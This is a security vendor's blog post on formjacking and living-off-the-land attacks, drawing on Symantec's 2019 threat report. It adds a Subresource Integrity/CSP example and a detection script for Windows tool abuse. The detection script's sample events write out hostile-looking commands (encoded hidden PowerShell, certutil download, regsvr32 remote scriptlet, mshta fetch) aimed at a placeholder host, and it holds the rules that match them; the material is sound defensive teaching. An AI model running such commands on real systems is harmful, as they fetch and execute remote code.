How cyber attackers are flying under the radar and what you can do about it
There are steps you can take to better detect intrusions and defend against agile threats
Cybercriminals responded to diminishing returns from ransomware and cryptojacking by shifting to stealthier and more destructive techniques in 2018, according to Symantec’s 2019 Internet Security Threat Report (ISTR).
The report, which analyzes data from Symantec’s Global Intelligence Network to highlight threat activity, noted that threat actors are succeeding with attacks that rely on both new and tried-and-true methods.
A breakthrough threat
Formjacking, the online equivalent of credit card skimming, emerged as a significant threat. In this “get rich quick” scheme, cybercriminals inject malicious JavaScript into the checkout pages of e-commerce sites. The site continues to operate normally and sales go through without interruption, even as the card numbers and other sensitive data that customers type into the payment form are copied and sent to the perpetrators.
Publicly reported attacks on the websites of companies like British Airways and Ticketmaster highlighted the problem, and according to Symantec, an average of 4,800 websites were compromised with formjacking code every month in 2018.
Our data shows that any company, anywhere in the world, which processes payments online is a potential victim of formjacking. – Symantec
Companies with robust defenses are not immune. Attackers often use third parties as stepping stones: they compromise a less well-defended supplier whose code the target’s site loads, so the skimmer arrives on the targeted website alongside legitimate processing. Symantec cited a 78% increase in supply chain attacks in 2018.
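One concrete control against the tampering of supplier-hosted scripts described above is Subresource Integrity (SRI), combined with a Content Security Policy that restricts where page scripts may send data. The following is an added example and is not code from the Symantec report or from the original post, neither of which names SRI or CSP. The script bodies, host names and the appended-skimmer stand-in are constructed for the demo.

```python
"""Subresource Integrity (SRI) pinning for scripts loaded from another origin.

Added example, not from the Symantec report or the original post. The page
embeds a cryptographic hash of each script it loads from a supplier, and the
browser refuses to execute a copy whose hash no longer matches. The script
bodies and host names below are constructed for this demo.
"""
import base64
import hashlib
import hmac

SRI_ALGORITHMS = ("sha256", "sha384", "sha512")  # the only digests SRI permits


def sri_hash(content: bytes, algo: str = "sha384") -> str:
    """Return the value for a <script integrity="..."> attribute, e.g. 'sha384-<base64>'."""
    if algo not in SRI_ALGORITHMS:
        raise ValueError(f"SRI permits only {SRI_ALGORITHMS}, not {algo!r}")
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def verify_sri(content: bytes, integrity: str) -> bool:
    """Mimic the browser check: the content passes if it matches any listed hash token."""
    for token in integrity.split():
        algo = token.partition("-")[0]
        if algo in SRI_ALGORITHMS and hmac.compare_digest(sri_hash(content, algo), token):
            return True
    return False


def script_tag(src: str, content: bytes) -> str:
    """Emit the pinned tag; crossorigin is required for SRI on cross-origin scripts."""
    return (f'<script src="{src}" integrity="{sri_hash(content)}" '
            f'crossorigin="anonymous"></script>')


def csp_header(script_hosts: list[str], connect_hosts: list[str]) -> str:
    """A Content-Security-Policy that limits where scripts may load from and where
    page scripts may send data. A skimmer that does run still cannot post card
    data to a host that is not listed in connect-src/form-action (default-src
    covers other channels such as image requests)."""
    return "; ".join([
        "default-src 'self'",
        "script-src 'self' " + " ".join(script_hosts),
        "connect-src 'self' " + " ".join(connect_hosts),
        "form-action 'self'",
    ])


# Constructed stand-ins for a supplier's script before and after compromise.
ORIGINAL = b"window.widget = { init: function () { /* legitimate widget code */ } };"
TAMPERED = ORIGINAL + b"\n/* appended skimmer: hooks the checkout form and posts card fields elsewhere */"

if __name__ == "__main__":
    pinned = sri_hash(ORIGINAL)
    print(script_tag("https://cdn.widget.example/widget.js", ORIGINAL))
    print("original passes:", verify_sri(ORIGINAL, pinned))   # True
    print("tampered passes:", verify_sri(TAMPERED, pinned))   # False
    print(csp_header(["https://cdn.widget.example"], ["https://api.widget.example"]))
```

SRI only helps where the supplier’s script has a fixed body you can hash at build time; a script that changes on every release needs the integrity value regenerated as part of your deployment, and neither SRI nor CSP helps when the skimmer is injected into your own first-party code or the exfiltration host is one you have allow-listed.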
Targeted attacks living off the land
According to the report, nearly one in 10 targeted attack groups now use malware to destroy or disrupt business operations, a 25% increase from the previous year.
They also continue to refine their techniques, favoring spear phishing over zero-day exploits and relying on living off the land (LotL) tactics.
LotL has been a cybersecurity buzzword for the last few years. Targeted attack groups are increasingly adopting these tactics, using trusted off-the-shelf and pre-installed software tools and operating system features so that their activity blends in with legitimate processes.
Dozens of Windows system tools can be used this way (PowerShell and WMI among them), and because they are signed, built-in binaries they are often whitelisted by application control, which makes them attractive to attackers. With LotL, attackers can gain remote access to a device, steal data, or disrupt operations without dropping a custom malware binary, so there is no suspicious file for signature-based tools to catch. Detection has to rely on context instead: which process launched the tool, what command line it was given, and whether that combination is normal for the host.
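Because the tools themselves are legitimate, LotL detection is a matter of judging process-creation events by their context rather than by file reputation. The following is an added example, not code from the Symantec report or the original post: a small set of heuristic rules run over constructed process-creation records in the shape of a Sysmon Event ID 1 or Security 4688 event (parent image, image, command line). The rules encode well-known abuse patterns of built-in Windows tools; the host names, paths and encoded payload in the sample records are placeholders, not real indicators.

```python
"""Heuristic detection of living-off-the-land (LotL) activity in process-creation events.

Added example, not from the Symantec report or the original post. The records
below are constructed for this demo and follow the shape of a Windows process
creation event (Sysmon Event ID 1 or Security 4688 with command-line logging
enabled). The rules are illustrative and need tuning against what is normal
in a given environment.
"""
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
URL = re.compile(r"https?://", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased final component of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _is(e: dict, name: str) -> bool:
    return basename(e["image"]) == name


# (rule name, predicate over one event). Switches are matched case-insensitively
# because Windows tools accept any casing.
RULES = [
    # A document viewer has no business launching a shell or script interpreter.
    ("office_spawns_script_host",
     lambda e: basename(e["parent"]) in OFFICE_APPS and basename(e["image"]) in SCRIPT_HOSTS),
    # -EncodedCommand (and its abbreviations) hides the real script from casual log review.
    ("powershell_encoded_command",
     lambda e: _is(e, "powershell.exe")
     and re.search(r"(?i)(^|\s)-(e|ec|enc|encodedcommand)(\s|$)", e["cmdline"]) is not None),
    # certutil is a certificate tool, but -urlcache fetches files and -decode unpacks base64.
    ("certutil_download_or_decode",
     lambda e: _is(e, "certutil.exe")
     and re.search(r"(?i)-(urlcache|decode)\b", e["cmdline"]) is not None),
    # regsvr32 /i: with a URL loads a remote scriptlet through the signed binary.
    ("regsvr32_remote_scriptlet",
     lambda e: _is(e, "regsvr32.exe")
     and re.search(r"(?i)/i:\s*https?://", e["cmdline"]) is not None),
    # mshta executes HTML applications, including ones fetched from the network.
    ("mshta_remote_content",
     lambda e: _is(e, "mshta.exe") and URL.search(e["cmdline"]) is not None),
]


def flag_events(events: list[dict]) -> list[tuple[str, str]]:
    """Return (rule_name, command_line) for every rule each event matches, in input order."""
    hits = []
    for e in events:
        for name, predicate in RULES:
            if predicate(e):
                hits.append((name, e["cmdline"]))
    return hits


# Constructed sample events; host names and paths are placeholders, not real indicators.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     # "SQBFAFgA" is the base64 of the UTF-16LE string "IEX"
     "cmdline": "powershell.exe -NoP -W Hidden -Enc SQBFAFgA"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://files.example/update.txt C:\\Users\\Public\\u.txt"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": "regsvr32.exe /s /n /u /i:http://files.example/r.sct scrobj.dll"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://files.example/page.hta"},
    # Benign administrative use of the same binaries should not fire.
    {"parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -verify C:\\certs\\server.cer"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
]

if __name__ == "__main__":
    for rule, cmdline in flag_events(SAMPLE_EVENTS):
        print(f"{rule:32} {cmdline}")
```

Two practical caveats: Security event 4688 carries the command line only when the “Include command line in process creation events” policy is enabled (Sysmon records it by default), and rules like these will fire on some legitimate administration, so each one needs a baseline of expected parent/child pairs per host role before it is promoted to an alert.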
The most likely reason an organization experienced a targeted attack, according to the ISTR, was intelligence gathering.
Protecting against attacks
While organizations in all industries are well aware of the potential impact of successful cyberattacks, many lack confidence in their cybersecurity efforts. Here are a few of the steps you can take to better detect intrusions and defend against agile threats:
- Strengthen threat and vulnerability management practices. Routinely conducting vulnerability assessments and penetration testing will help you direct security spending to the technologies and strategies that add the most value to your security program. Good cyber hygiene, including timely patching and strong password practices, is the bare minimum needed to protect sensitive data and keep your network secure. Incorporating endpoint detection and response (EDR), threat intelligence, network analytics, and defensive deception into your program can help you detect and thwart intrusions, and better understand how you are being targeted.
- Address third-party risk. Weaknesses in your partners’ security can have a dramatic impact on your own security posture, and that includes any third-party code that runs on your websites. Carefully monitor the security practices of partners and vendors, and engage in third-party due diligence and periodic assessments to confirm that cybersecurity requirements are being met throughout your supply chain.
- Promote security awareness. Humans are the weakest link in any security strategy, so security awareness at all levels of the organization is critical. Continuously educate your employees about best practices and the latest threats, and emphasize the need for caution with unsolicited or suspicious emails. Make sure you have strong corporate policies covering bring-your-own-device programs, as well as the applications, cloud resources, and IoT devices employees connect to your network.
Professional assessments can help you gauge your current capabilities and develop an actionable roadmap for maturing your organization’s overall security posture.
To learn more about best security practices for your organization, contact your SHI account executive.
Anne Grahn contributed to this post.